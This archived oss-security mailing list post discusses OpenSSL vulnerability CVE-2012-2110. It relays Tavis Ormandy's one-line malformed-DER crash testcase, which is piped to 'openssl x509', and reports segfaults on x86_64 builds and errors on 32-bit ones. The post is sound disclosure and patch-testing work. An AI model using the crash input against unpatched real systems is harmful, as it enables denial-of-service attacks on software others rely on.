oss-sec mailing list archives
Re: OpenSSL ASN1 BIO vulnerability (CVE-2012-2110)
From: Solar Designer <solar () openwall com>
Date: Sun, 22 Apr 2012 16:23:11 +0400
Hi, On Fri, Apr 20, 2012 at 01:11:19PM +0400, Solar Designer wrote:
Tavis Ormandy of Google Security Team found a vulnerability in OpenSSL: incorrect integer conversions in OpenSSL can result in memory corruption. http://lists.openwall.net/full-disclosure/2012/04/19/4 Advisory from OpenSSL: http://openssl.org/news/secadv_20120419.txt
Tavis posted a followup to my message, where he attached a testcase that was unfortunately above oss-security's message size limit - so the message did not make it to the list. I've gzip-compressed the file and have re-attached it to this message now (it's only 3 KB when compressed). Tavis' message was: On Fri, Apr 20, 2012 at 09:20:39PM +0200, Tavis Ormandy wrote:
FWIW, here is the testcase I sent to openssl-team. A smaller one that's easier to test is this: $ printf "\xe3\x80\x81\x84\xe3\x80\x00\x00\x00\x00" | openssl x509 -inform DER Tavis.
FWIW, trying these two on OpenSSL 1.0.0d (the Owl package, which includes some unrelated patches), I get: x86_64 build: $ printf "\xe3\x80\x81\x84\xe3\x80\x00\x00\x00\x00" | openssl x509 -inform DER Segmentation fault $ openssl x509 -inform DER < openssl-1.0.1-testcase-32bit.crt unable to load certificate 47191757631152:error:0D0680A8:asn1 encoding routines:ASN1_CHECK_TLEN:wrong tag:tasn_dec.c:1319: 47191757631152:error:0D07803A:asn1 encoding routines:ASN1_ITEM_EX_D2I:nested asn1 error:tasn_dec.c:381:Type=X509 i686 build: $ printf "\xe3\x80\x81\x84\xe3\x80\x00\x00\x00\x00" | openssl x509 -inform DER unable to load certificate 3082893472:error:0D07207B:asn1 encoding routines:ASN1_get_object:header too long:asn1_lib.c:150: $ openssl x509 -inform DER < openssl-1.0.1-testcase-32bit.crt unable to load certificate 3083593888:error:0D0680A8:asn1 encoding routines:ASN1_CHECK_TLEN:wrong tag:tasn_dec.c:1319: 3083593888:error:0D07803A:asn1 encoding routines:ASN1_ITEM_EX_D2I:nested asn1 error:tasn_dec.c:381:Type=X509 So no luck triggering a crash on 32-bit, although we must patch the issue on 32-bit as well. I'm not sure if I am using the larger testcase correctly, though. I am not familiar with this. The smaller testcase also triggers a segfault on OpenSSL 0.9.7m (with unrelated patches) on x86_64. So not surprisingly some versions older than 0.9.8 are vulnerable as well. Alexander
Attachment:
openssl-1.0.1-testcase-32bit.crt.gz
Description:
Current thread:
- OpenSSL ASN1 BIO vulnerability (CVE-2012-2110) Solar Designer (Apr 20)
- Re: OpenSSL ASN1 BIO vulnerability (CVE-2012-2110) Solar Designer (Apr 22)
- Re: OpenSSL ASN1 BIO vulnerability (CVE-2012-2110) Solar Designer (Apr 22)
- Re: OpenSSL ASN1 BIO vulnerability (CVE-2012-2110) Tomas Hoger (Apr 24)
- Re: OpenSSL ASN1 BIO vulnerability (CVE-2012-2110) Tavis Ormandy (Apr 24)
- Re: OpenSSL ASN1 BIO vulnerability (CVE-2012-2110) Solar Designer (Apr 24)
- Re: OpenSSL ASN1 BIO vulnerability (CVE-2012-2110) Solar Designer (Apr 22)
- Re: OpenSSL ASN1 BIO vulnerability (CVE-2012-2110) Tavis Ormandy (Apr 24)
- Re: OpenSSL ASN1 BIO vulnerability (CVE-2012-2110) Solar Designer (Apr 22)